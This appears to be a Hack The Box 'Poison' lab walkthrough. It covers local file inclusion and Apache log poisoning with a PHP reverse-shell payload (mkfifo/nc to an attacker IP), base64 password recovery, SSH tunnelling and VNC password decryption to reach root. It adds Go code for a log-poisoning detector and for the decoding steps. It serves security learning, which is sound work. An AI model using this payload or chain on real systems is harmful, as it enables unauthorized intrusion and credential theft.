Disclaimer

The host attacked in this write-up was accessed with legitimate authorization. The tools and methods used here are for learning and exchange only; do not use the tools or the approach described here for any illegal purpose. I accept no responsibility for any consequences of doing so, nor for any misuse or damage caused.

Service discovery

Probing for open ports

    ┌──(rootkali)-[~/htb/Poison]
    └─# nmap -p- 10.10.10.84 --open
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 21:11 EST
    Nmap scan report for 10.10.10.84
    Host is up (0.30s latency).
    Not shown: 37616 filtered ports, 27917 closed ports
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http

    Nmap done: 1 IP address (1 host up) scanned in 161.63 seconds

Service details for the open ports

    ┌──(rootkali)-[~/htb/Poison]
    └─# nmap -sV -T4 -A -O 10.10.10.84 -p 22,80
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 21:15 EST
    Nmap scan report for 10.10.10.84
    Host is up (0.27s latency).

    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
    | ssh-hostkey:
    |   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
    |   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
    |_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
    |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
    |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: FreeBSD 11.0-RELEASE - 12.0-CURRENT (97%), FreeBSD 11.1-STABLE (97%), FreeBSD 11.1-RELEASE or 11.2-STABLE (95%), FreeBSD 11.2-RELEASE - 11.3 RELEASE or 11.2-STABLE (95%), FreeBSD 11.0-STABLE (95%), FreeBSD 11.3-RELEASE (95%), FreeBSD 11.1-RELEASE (94%), FreeBSD 11.0-CURRENT (94%), FreeBSD 11.0-RELEASE (94%), FreeBSD 12.0-RELEASE - 13.0-CURRENT (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

    TRACEROUTE (using port 22/tcp)
    HOP RTT       ADDRESS
    1   290.93 ms 10.10.14.1
    2   290.23 ms 10.10.10.84

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 25.96 seconds

Web

The HTTP service has a file inclusion vulnerability: whatever filename is supplied in the request gets included, for example
http://10.10.10.84/browse.php?file=phpinfo.php

renders the output of the phpinfo.php script.

We guess the server-side code looks something like

    $file = $_GET['file'];
    include_once($file);

The file parameter is clearly under our control. The following payload prints /etc/passwd, which confirms the file inclusion vulnerability:

http://10.10.10.84/browse.php?file=../../../../../etc/passwd

    # $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
    #
    root:*:0:0:Charlie &:/root:/bin/csh
    toor:*:0:0:Bourne-again Superuser:/root:
    daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
    operator:*:2:5:System &:/:/usr/sbin/nologin
    bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
    tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
    kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
    games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
    news:*:8:8:News Subsystem:/:/usr/sbin/nologin
    man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
    sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
    smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
    mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
    bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
    unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
    proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
    _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
    _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
    uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
    pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
    auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
    www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
    _ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
    hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
    nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
    _tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
    messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
    avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
    cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
    charix:*:1001:1001:charix:/home/charix:/bin/csh

There is a regular user called charix with a real login shell.

Turning a file inclusion vulnerability into a shell generally needs three things:

  1. Whatever is included is executed as PHP. include_once() evaluates the file it reads as PHP code regardless of the file's name or extension, so this is a property of the inclusion itself, not of the web server.
  2. A file inclusion vulnerability.
  3. Either the web server's log file can be read through the inclusion, or we control a file upload.

See this article for a worked example.

Condition 1 holds because of how include_once() works; the Apache version (2.4.29 here) does not matter for it. Condition 2 we have already confirmed.

That leaves condition 3. No upload point was found, so the web server log is the way in. Enumerating common log locations through the inclusion shows the access log at /var/log/httpd-access.log, which is the default CustomLog path of the FreeBSD apache24 port.

Let's look at what a single log entry records:

    "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 10.10.14.3 - - [30/Dec/2021:03:48:50 +0100] "GET /browse.php?file=../../../../../var/log/httpd-access.log HTTP/1.1" 200 3208001 "-

It records the browser's User-Agent, the source IP, the timestamp, the request line (our input, including the HTTP version), the status code and the response size. Note that the User-Agent comes first, so this server uses a custom LogFormat rather than Apache's default "combined" layout.

Testing shows that a payload placed directly in the URL does not work: the browser (and Burp) percent-encode the query string, so it lands in the log as %3C%3Fphp... and is never interpreted. The User-Agent header, however, is written to the log verbatim, so PHP code can be injected there.

We use the following payload. Get it right the first time: once the log is included, every line in it is parsed as PHP, so a syntactically broken payload poisons the log until it is rotated and breaks every later attempt.

    <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f'); ?>

The request as sent from Burp Suite (the query string still carries an earlier, percent-encoded test payload, which is harmless; the working payload is in User-Agent):

    GET /browse.php?file=%3C%3Fphp+echo+%27hi%27%3B+%3F%3E HTTP/1.1
    Host: 10.10.10.84
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f'); ?> Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://10.10.10.84/
    Upgrade-Insecure-Requests: 1

Then, with a listener running, request http://10.10.10.84/browse.php?file=../../../../../var/log/httpd-access.log so that the poisoned log is included and the injected PHP runs.

We get a reverse shell as the www user:

    ┌──(rootkali)-[~/htb/Poison]
    └─# nc -lnvp 4444
    listening on [any] 4444 ...
    connect to [10.10.14.3] from (UNKNOWN) [10.10.10.84] 16668
    sh: can't access tty; job control turned off
    $ id
    uid=80(www) gid=80(www) groups=80(www)
    $ whoami
    www
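The defender's side of the log-poisoning procedure above, as an added example that is not part of the original write-up: a small Go scanner that parses access-log lines in the field order this server uses (User-Agent first, then client IP, ident, user, timestamp, request line, status, size) and flags the three things the attack leaves behind: a PHP open tag in the User-Agent, a PHP open tag in the request line after percent-decoding (the attempt that fails because the browser encodes it), and a request that traverses into /var/log. The three log lines in `sampleLog` are constructed for this example and modelled on the entry quoted earlier; the rule names are my own.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one indicator of log poisoning, tied to the 1-based log line.
type Finding struct {
	Line   int
	Rule   string
	Detail string
}

// accessLine follows the field order seen in this server's log: the
// User-Agent comes first, then client IP, ident, user, timestamp, request
// line, status and size. Quoted fields may contain backslash-escaped quotes,
// which is how Apache writes them.
var accessLine = regexp.MustCompile(
	`^"((?:[^"\\]|\\.)*)" (\S+) \S+ \S+ \[([^\]]+)\] "((?:[^"\\]|\\.)*)" (\d{3}) (\S+)`)

// phpTag matches a PHP open tag; <?xml and similar are deliberately not matched.
var phpTag = regexp.MustCompile(`(?i)<\?(?:php\b|=)`)

// ScanAccessLog flags a PHP tag in the User-Agent (the vector used on this box),
// a PHP tag in the request line after percent-decoding, and a request that
// traverses into /var/log (the include that triggers the poisoned entry).
func ScanAccessLog(lines []string) []Finding {
	var out []Finding
	for i, raw := range lines {
		m := accessLine.FindStringSubmatch(raw)
		if m == nil {
			continue // not in this log format; skip rather than guess
		}
		n, ua, req := i+1, m[1], m[4]
		if phpTag.MatchString(ua) {
			out = append(out, Finding{n, "php-tag-in-user-agent", ua})
		}
		decoded, err := url.QueryUnescape(req)
		if err != nil {
			decoded = req // malformed escapes: fall back to the raw text
		}
		if phpTag.MatchString(decoded) {
			out = append(out, Finding{n, "php-tag-in-request", decoded})
		}
		if strings.Contains(decoded, "../") && strings.Contains(decoded, "/var/log/") {
			out = append(out, Finding{n, "log-file-inclusion", decoded})
		}
	}
	return out
}

// sampleLog is constructed for this example: a normal request, the poisoning
// request (payload in User-Agent, encoded test payload in the query), and the
// include that triggers it.
var sampleLog = []string{
	`"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 10.10.14.3 - - [30/Dec/2021:03:40:12 +0100] "GET /browse.php?file=phpinfo.php HTTP/1.1" 200 65290 "-"`,
	`"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) <?php system('id'); ?> Gecko/20100101 Firefox/78.0" 10.10.14.3 - - [30/Dec/2021:03:47:31 +0100] "GET /browse.php?file=%3C%3Fphp+echo+%27hi%27%3B+%3F%3E HTTP/1.1" 200 3 "-"`,
	`"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 10.10.14.3 - - [30/Dec/2021:03:48:50 +0100] "GET /browse.php?file=../../../../../var/log/httpd-access.log HTTP/1.1" 200 3208001 "-"`,
}

func main() {
	for _, f := range ScanAccessLog(sampleLog) {
		fmt.Printf("line %d: %s: %s\n", f.Line, f.Rule, f.Detail)
	}
}
```

Run against a real httpd-access.log, the second rule mostly fires on failed attempts and the first on the one that worked; the third is the cheapest signal of all, because a legitimate client never asks browse.php for a path under /var/log.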

Escalating to charix

In the web root, /usr/local/www/apache24/data, there is a backed-up, encoded password file:

    $ cat pwdbackup.txt
    This password is secure, it's encoded atleast 13 times.. what could go wrong really..
    (base64-encoded blob, omitted here)

Base64-decoding it repeatedly (13 rounds, as the note promises) yields the password: Charix!2#4%6&8(0
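The repeated decoding, as an added example rather than code from the original write-up: instead of counting rounds by hand, strip whitespace, decode, and stop the moment the result is no longer valid base64 or stops being printable text (a plaintext like "abcd" is valid base64 but decodes to garbage, so the printability check prevents going one layer too far). The sample blob is constructed inside the block by encoding the recovered password 13 times with 76-column wrapping, standing in for the omitted contents of pwdbackup.txt.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// printable reports whether every byte is printable ASCII or ordinary
// whitespace; a decode step that yields anything else has gone one layer
// too far (or the input was never base64 to begin with).
func printable(b []byte) bool {
	for _, c := range b {
		if (c < 0x20 || c > 0x7e) && c != '\n' && c != '\r' && c != '\t' {
			return false
		}
	}
	return true
}

// PeelBase64 strips nested base64 layers until the data stops decoding
// cleanly, returning the innermost text and the number of layers removed.
// Whitespace (the line wrapping that base64 tools emit) is ignored before
// each decode attempt.
func PeelBase64(blob string) (string, int) {
	cur, depth := blob, 0
	for {
		compact := strings.Join(strings.Fields(cur), "")
		dec, err := base64.StdEncoding.DecodeString(compact)
		if err != nil || !printable(dec) {
			return strings.TrimSpace(cur), depth
		}
		depth++
		cur = string(dec)
	}
}

// wrapBase64 exists only to build the constructed sample: it encodes plain
// `rounds` times, wrapping every layer at 76 columns like `base64` does.
func wrapBase64(plain string, rounds int) string {
	cur := plain
	for i := 0; i < rounds; i++ {
		enc := base64.StdEncoding.EncodeToString([]byte(cur))
		var sb strings.Builder
		for len(enc) > 76 {
			sb.WriteString(enc[:76] + "\n")
			enc = enc[76:]
		}
		sb.WriteString(enc + "\n")
		cur = sb.String()
	}
	return cur
}

func main() {
	// Constructed sample: the password from this box, encoded 13 times,
	// standing in for the blob in pwdbackup.txt.
	blob := wrapBase64("Charix!2#4%6&8(0", 13)
	pw, depth := PeelBase64(blob)
	fmt.Printf("%d base64 layers -> %q\n", depth, pw)
}
```

To use it on the real file, read pwdbackup.txt, drop the first (plain-English) line, and pass the rest to PeelBase64.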

Log in over SSH as charix

    └─# ssh charix@10.10.10.84
    The authenticity of host '10.10.10.84 (10.10.10.84)' can't be established.
    RSA key fingerprint is SHA256:IZ4OMzVPPZx2SlxKP/M0k/XAN8A1D6UpXXHcuMlJZXQ.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.10.84' (RSA) to the list of known hosts.
    Password for charix@Poison:
    Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
    FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

    Welcome to FreeBSD!

    Release Notes, Errata: https://www.FreeBSD.org/releases/
    Security Advisories:   https://www.FreeBSD.org/security/
    FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
    FreeBSD FAQ:           https://www.FreeBSD.org/faq/
    Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
    FreeBSD Forums:        https://forums.FreeBSD.org/

    Documents installed with the system are in the /usr/local/share/doc/freebsd/
    directory, or can be installed later with:  pkg install en-freebsd-doc
    For other languages, replace "en" with a language code like de or fr.

    Show the version of FreeBSD installed:  freebsd-version ; uname -a
    Please include that output and any error messages when posting questions.
    Introduction to manual pages:  man man
    FreeBSD directory layout:      man hier

    Edit /etc/motd to change this login announcement.
    By pressing "Scroll Lock" you can use the arrow keys to scroll backward
    through the console output.  Press "Scroll Lock" again to turn it off.
    charix@Poison:~ % id
    uid=1001(charix) gid=1001(charix) groups=1001(charix)
    charix@Poison:~ % whoami
    charix

Privilege escalation to root

charix's home directory contains a file called secret.zip.

Extracting it with charix's SSH password as the archive password yields a file named secret, but it is not readable text:

    ┌──(rootkali)-[~/htb/Poison]
    └─# cat secret
    ��[|z!

Looking at listening sockets, two services of interest are bound to localhost only:

    charix@Poison:~ % netstat -an | grep LISTEN
    tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
    tcp4       0      0 *.80                   *.*                    LISTEN
    tcp6       0      0 *.80                   *.*                    LISTEN
    tcp4       0      0 *.22                   *.*                    LISTEN
    tcp6       0      0 *.22                   *.*                    LISTEN
    tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
    tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

On Kali, run the following two commands to forward both ports over SSH (the two -L options can also be given to a single ssh invocation):

ssh -L 5801:127.0.0.1:5801 charix@10.10.10.84

ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

Scan the forwarded local ports 5801 and 5901 to identify the services:

    ┌──(rootkali)-[~/htb/Poison]
    └─# nmap -sV -Pn 127.0.0.1 -p 5801,5901
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 03:01 EST
    Nmap scan report for localhost (127.0.0.1)
    Host is up (0.000064s latency).

    PORT     STATE SERVICE VERSION
    5801/tcp open  http    Bacula http config
    5901/tcp open  vnc     VNC (protocol 3.8)

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 17.79 seconds

So a VNC server is running: 5901 is display :1, and 5801 is the matching HTTP port that VNC servers expose for the Java viewer (nmap's "Bacula http config" label is a misidentification). The odd 8-byte file is therefore most likely a VNC password file. Those hold the password DES-encrypted with a fixed key that is hard-coded in every VNC implementation, so "encrypted" here means trivially reversible by anyone who has the file.

Use the vncpwd tool to decrypt the secret file:

    ┌──(rootkali)-[~/htb/Poison/vncpwd]
    └─# ./vncpwd /root/htb/Poison/secret
    Password: VNCP@$$!
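What vncpwd is doing, as an added example that is not the tool's own code nor part of the original write-up: VNC's vncpasswd takes the password, truncates or NUL-pads it to exactly 8 bytes, and encrypts that single block with DES-ECB under the constant key {23,82,107,6,35,78,88,7} from vncauth.c. VNC's bundled d3des consumes key bits least-significant-bit first, so to use a standard DES implementation such as Go's crypto/des each key byte must be bit-reversed, which gives the e84ad660c4721ae0 key that stand-alone decoders hard-code. The block below derives that key, reproduces the encryption so that the stored format is clear, and decrypts it again; the sample input is constructed in the block from the password recovered above, since the raw bytes of the real secret file are not reproduced legibly on this page.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
	"math/bits"
)

// vncFixedKey is the constant every VNC implementation uses for the password
// file, as it appears in the original vncauth.c: {23,82,107,6,35,78,88,7}.
var vncFixedKey = [8]byte{23, 82, 107, 6, 35, 78, 88, 7}

// vncKey returns that key in the form a standard DES implementation expects.
// VNC's d3des consumes each key byte least-significant-bit first, so every
// byte is bit-reversed for crypto/des; the result is e84ad660c4721ae0.
func vncKey() []byte {
	k := make([]byte, 8)
	for i, b := range vncFixedKey {
		k[i] = bits.Reverse8(b)
	}
	return k
}

// EncryptVNCPassword does what vncpasswd does when it writes ~/.vnc/passwd:
// the password is NUL-padded or silently truncated to 8 bytes and encrypted
// as one DES-ECB block. There is no salt and no secret, so the output is a
// fixed function of the first eight password characters.
func EncryptVNCPassword(password string) []byte {
	var block [8]byte
	copy(block[:], password) // copy stops at 8 bytes: longer passwords are cut off
	c, err := des.NewCipher(vncKey())
	if err != nil {
		panic(err) // key length is fixed at 8, so this cannot happen
	}
	out := make([]byte, des.BlockSize)
	c.Encrypt(out, block[:])
	return out
}

// DecryptVNCPassword recovers the plaintext from a password file such as the
// `secret` file on this box. Only the first block matters; anything shorter
// than one DES block is not a VNC password file.
func DecryptVNCPassword(stored []byte) (string, error) {
	if len(stored) < des.BlockSize {
		return "", errors.New("input shorter than one DES block (8 bytes)")
	}
	c, err := des.NewCipher(vncKey())
	if err != nil {
		return "", err
	}
	out := make([]byte, des.BlockSize)
	c.Decrypt(out, stored[:des.BlockSize])
	return string(bytes.TrimRight(out, "\x00")), nil
}

func main() {
	// Constructed sample: the password recovered on this box, run through the
	// same transformation vncpasswd applies, then decrypted again.
	stored := EncryptVNCPassword("VNCP@$$!")
	fmt.Printf("key      : %s\n", hex.EncodeToString(vncKey()))
	fmt.Printf("stored   : %s\n", hex.EncodeToString(stored))
	pw, err := DecryptVNCPassword(stored)
	fmt.Printf("decrypted: %q (err=%v)\n", pw, err)
}
```

To decode a real file, read it with os.ReadFile and hand the bytes to DecryptVNCPassword. The truncation to eight characters is worth remembering on the defensive side as well: a 20-character VNC password gives no more strength than its first eight characters.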

Connect with vncviewer localhost:5901 and enter the recovered plaintext password.

We land on root's desktop:

    ┌──(rootkali)-[~/htb/Poison]
    └─# vncviewer localhost:5901
    Connected to RFB server, using protocol version 3.8
    Enabling TightVNC protocol extensions
    Performing standard VNC authentication
    Password:
    Authentication successful
    Desktop name "root's X desktop (Poison:1)"
    VNC server default format:
      32 bits per pixel.
      Least significant byte first in each pixel.
      True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
    Using default colormap which is TrueColor.  Pixel format:
      32 bits per pixel.
      Least significant byte first in each pixel.
      True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
    Same machine: preferring raw encoding

Later I found that the encrypted secret file can be handed to vncviewer directly, because -passwd expects exactly this 8-byte DES-encrypted format:

    vncviewer -passwd /root/htb/Poison/secret 127.0.0.1::5901

One final gripe: driving VNC over a remote link from within China is painfully slow.